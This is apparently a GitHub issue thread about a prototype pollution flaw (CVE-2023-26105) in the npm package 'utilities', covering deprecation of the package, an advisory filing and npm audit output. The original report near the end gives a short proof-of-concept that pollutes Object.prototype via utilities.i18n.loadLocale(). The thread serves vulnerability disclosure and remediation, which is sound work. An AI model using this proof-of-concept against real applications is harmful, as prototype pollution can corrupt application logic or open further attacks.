Prototype Pollution using utilities.i18n.loadLocale() #29
Comments
|
@mde Snyk send us an email regarding to this vulnerability, so can you check your mailbox? If you no longer have time to maintain this package, how about deprecating this package for now? I checked the dependencies on npm and there were no packages actively maintained, so I believe there is minimum impact. I found I have a permission to control this package on npm, so if you agree with deprecating In addition, Snyk will assign CVE for this vulnerability and I guess it would be reported by |
|
@phanect, that would be much appreciated. どうもありがとうございます! |
|
@mde Thanks for the reply. |
|
Yes, please. And thank you very much! |
|
OK, I will deprecate it later. |
|
🫡🫡🫡🫡 |
|
I have deprecated this I keep this issue open so that you can resolve this vulnerability in case you want to restart the maintenance for |
|
@mde I think we should also flag this package on npmjs.com so that I asked npm support how to register the vulnerability on npmjs.com, and they told me that we could register by creating a security advisory on GitHub. Can you create a security advisory? Or if you temporarily give me permission to this repository, I will publish a security advisory on your behalf. (However, the Admin role is required.) |
|
@mde I found I could send an update request to GitHub's vulnerability database from the link of CVE-2023-26105 by myself, so I have sent the request. Therefore, you no-longer have to write a security advisory. It has been published and now $ cat package.json
{
"name": "test",
"version": "1.0.0",
"license": "UNLICENSED",
"dependencies": {
"utilities": "latest"
}
}
$ npm install
npm WARN deprecated utilities@1.0.6: This package is no longer maintained and vulnerability exists.
added 1 package, and audited 2 packages in 394ms
1 high severity vulnerability
Some issues need review, and may require choosing
a different dependency.
Run `npm audit` for details.
$ npm audit
# npm audit report
utilities *
Severity: high
mde utilities contains Prototype Pollution - https://github.com/advisories/GHSA-wxfj-84xf-7gxv
No fix available
node_modules/utilities
1 high severity vulnerability
Some issues need review, and may require choosing
a different dependency.I think that's all for the response to this vulnerability. |
|
Thank you!
…On Mon, Mar 6, 2023 at 2:45 PM Jumpei Ogawa ***@***.***> wrote:
I found I could send an update request to GitHub's vulnerability database
from the link of CVE-2023-26105
<https://github.com/advisories/GHSA-wxfj-84xf-7gxv>, so I have sent the
request <github/advisory-database#1751>.
It has been published and now npm audit warns of the vulnerability.
$ cat package.json
{
"name": "test",
"version": "1.0.0",
"license": "UNLICENSED",
"dependencies": {
"utilities": "latest"
}
}
$ npm install
npm WARN deprecated ***@***.***: This package is no longer maintained and vulnerability exists.
added 1 package, and audited 2 packages in 394ms
1 high severity vulnerability
Some issues need review, and may require choosing
a different dependency.
Run `npm audit` for details.
$ npm audit# npm audit report
utilities *
Severity: high
mde utilities contains Prototype Pollution - https://github.com/advisories/GHSA-wxfj-84xf-7gxv
No fix available
node_modules/utilities
1 high severity vulnerability
Some issues need review, and may require choosing
a different dependency.
I think that's all for the response to this vulnerability.
—
Reply to this email directly, view it on GitHub
<#29 (comment)>, or
unsubscribe
<https://github.com/notifications/unsubscribe-auth/AAAAF5KWM3G2AGNYCO3KJE3W2ZSJNANCNFSM6AAAAAATKOE45Y>
.
You are receiving this because you were mentioned.Message ID:
***@***.***>
|
Hi,There's a prototype pollution vulnerability in function _mix() in utilities/lib/core.js, the risk locate is in here:
utilities/lib/core.js
Line 65 in ba6be1f
utilities/lib/core.js
Line 41 in ba6be1f
and the POC is:
var utilities = require("utilities")
bad_objects= {test:"123"}
console.log("Before:"+{}.test)
utilities.i18n.loadLocale("proto",bad_objects,{},true)
console.log("After:"+{}.test)
In the file i18n.js, there is a function called loadLocale, which calls the mixin function in utilities/lib/core.js, and it calls the _mix function in 22 lines, and in the _mix function, where the object is merged, resulting in prototype pollution
More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
The text was updated successfully, but these errors were encountered: